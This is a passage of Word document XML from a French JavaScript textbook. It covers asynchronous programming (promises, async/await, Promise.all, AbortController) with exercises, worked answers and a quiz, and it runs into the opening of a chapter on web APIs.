              </w:rPr>
              <w:t>await</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> oublié</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3155"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Promise</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> au lieu d'une valeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3155"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vérifier les types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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catch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> vide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="315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Erreurs invisibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="315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Journaliser ou propager</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attente inutile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3155"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Interface figée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3155"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Afficher un état, rendre la main</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le piège du `forEach` asynchrone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Ne fonctionne pas : forEach n'attend pas</w:t>
        <w:br/>
        <w:t>elements.forEach(async (element) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  await traiter(element);</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:t>console.log("Terminé ?");   // s'affiche avant la fin</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Fonctionne : séquentiel ou parallèle, mais attendu</w:t>
        <w:br/>
        <w:t>const resultats = await Promise.all(elements.map(e =&gt; traiter(e)));</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TROIS QUESTIONS AVANT UN APPEL RÉSEAU</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Que montre l'interface pendant l'attente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Que se passe-t-il si la réponse arrive après le départ de l'utilisateur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Que se passe-t-il si deux réponses arrivent dans le désordre ?</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JavaScript est mono-thread : l'asynchrone évite de geler l'interface.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promesse est en attente, tenue ou rejetée, et ne change plus ensuite.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async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rend le code asynchrone linéaire.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await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doit être protégé par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou propagé.</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Promise.all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parallélise ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>allSettled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tolère les échecs.</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AbortController</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annule une requête obsolète.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forEach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'attend pas les callbacks asynchrones.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les principes sont posés. Le chapitre suivant les applique aux API distantes : requêtes, formats et gestion des erreurs réseau.</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29.1 — Paralleliser trois chargements</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Trois ressources indépendantes sont chargées en séquence.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Identifiez le temps total actuel.</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 xml:space="preserve">Parallélisez avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Promise.all</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Prévoyez un comportement si l'une échoue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 29.2 — Annuler une recherche obsolète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 champ de recherche lance une requête à chaque frappe.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Stockez le contrôleur courant.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Annulez la requête précédente.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Ignorez les erreurs d'annulation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 29.3 — Décomposer une chaîne maladroite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   REFACTORISATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cette fonction enchaîne quatre appels et un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> global.</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fetch(a).then(r=&gt;r.json()).then(x=&gt;fetch(b)).then(r=&gt;r.json()).then(afficher).catch(console.log)</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Ajoutez des messages d'erreur distincts.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Conservez le résultat intermédiaire.</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29.1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async function chargerTableauDeBord() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const [profil, stats, messages] = await Promise.all([</w:t>
        <w:br/>
        <w:t xml:space="preserve">    chargerProfil(),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    chargerStatistiques(),</w:t>
        <w:br/>
        <w:t xml:space="preserve">    chargerMessages(),</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ]);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return { profil, stats, messages };</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Variante tolérante aux pannes</w:t>
        <w:br/>
        <w:t>async function chargerSouple() {</w:t>
        <w:br/>
        <w:t>const r = await Promise.allSettled([chargerProfil(), chargerStatistiques()]);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return r.map(x =&gt; (x.status === "fulfilled" ? x.value : null));</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois appels de 300 ms passent de 900 ms à environ 300 ms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>allSettled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet d'afficher ce qui a pu être chargé plutôt que rien du tout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 29.2</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let controleur = null;</w:t>
        <w:br/>
        <w:br/>
        <w:t>async function rechercher(terme) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  controleur?.abort();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  controleur = new AbortController();</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const r = await fetch(`/api/recherche?q=${encodeURIComponent(terme)}`,</w:t>
        <w:br/>
        <w:t xml:space="preserve">      { signal: controleur.signal });</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const resultats = await r.json();</w:t>
        <w:br/>
        <w:t xml:space="preserve">    afficher(resultats);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  } catch (e) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (e.name === "AbortError") return;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    console.error(e);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>champ.addEventListener("input", e =&gt; rechercher(e.target.value));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque frappe annule la précédente : seule la dernière réponse est affichée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>encodeURIComponent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche qu'un terme contenant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> casse l'URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 29.3</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async function charger() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  let profil;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const r1 = await fetch("/api/profil");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (!r1.ok) throw new Error(`Profil indisponible (${r1.status})`);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    profil = await r1.json();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  } catch (e) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    throw new Error(`Impossible de charger le profil : ${e.message}`);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const r2 = await fetch(`/api/commandes/${profil.id}`);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if (!r2.ok) throw new Error(`Commandes indisponibles (${r2.status})`);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return await r2.json();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  } catch (e) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    throw new Error(`Impossible de charger les commandes : ${e.message}`);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Des messages d'erreur distincts indiquent quelle étape a échoué.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> englobe la lecture du JSON autant que la requête : les deux peuvent échouer.</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 xml:space="preserve">Que renvoie une fonction déclarée </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>async</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Une valeur</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Une promesse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Un callback</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undefined</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Quelle méthode attend toutes les promesses mais échoue au premier rejet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Promise.race</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Promise.all</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Promise.allSettled</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Promise.any</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur le fil principal du navigateur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Il le bloque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Il suspend seulement la fonction</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Il redémarre la page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Il annule la requête</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 xml:space="preserve">Pourquoi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>forEach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne fonctionne-t-il pas avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>async</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Il est déprécié</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Il n'attend pas les callbacks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Il ne renvoie rien</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Il est synchrone</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 xml:space="preserve">À quoi sert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AbortController</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À compresser une requête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À annuler une requête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À mettre en cache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À réessayer</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Une fonction </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> renvoie toujours une promesse, résolue avec la valeur de retour.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Promise.all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rejette dès qu'une des promesses est rejetée.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suspend la fonction asynchrone et rend la main à la boucle d'événements.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>forEach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ignore les promesses renvoyées : utilisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>for...of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Promise.all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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Il permet d'interrompre un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> via son signal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>30. Consommer une API web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Lire et envoyer des données : format JSON, codes HTTP, erreurs réseau et bonnes pratiques d'intégration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 29</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Lire une documentation d'API et construire une requête correcte.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Distinguer erreur réseau, erreur HTTP et erreur de données.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Envoyer des données en JSON et en formulaire.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Gérer l'authentification et ne jamais exposer de secret.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Mettre en cache et limiter les appels.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>30.1 Anatomie d'une requête</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
